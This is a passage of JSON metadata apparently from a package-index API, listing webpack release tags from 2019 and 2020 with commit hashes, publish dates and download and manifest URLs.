:"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo